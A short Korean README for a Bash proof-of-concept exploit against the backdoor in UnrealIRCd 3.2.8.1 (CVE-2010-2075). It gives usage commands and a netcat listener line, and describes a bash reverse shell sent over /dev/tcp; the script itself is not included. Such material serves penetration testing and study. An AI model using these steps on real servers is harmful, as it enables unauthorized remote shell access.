
CVE-2010-2075 exploit
UnrealIRCd 3.2.8.1 소스 tarball에 삽입된 백도어를 위한 Bash PoC입니다.
변조된 바이너리는 IRC 포트로 전송된 AB; 접두사가 붙은 임의의 명령을 실행합니다.
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
예제:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
실행 전에 리스너를 설정하세요:
nc -lvnp 4444
백도어는 수신 데이터에 AB; 접두사가 있는지 확인하고 나머지를 시스템 셸로
전달합니다. 페이로드는 /dev/tcp를 통해 bash 리버스 셸을 전송합니다.
교육 및 승인된 테스트 용도로만 사용하십시오.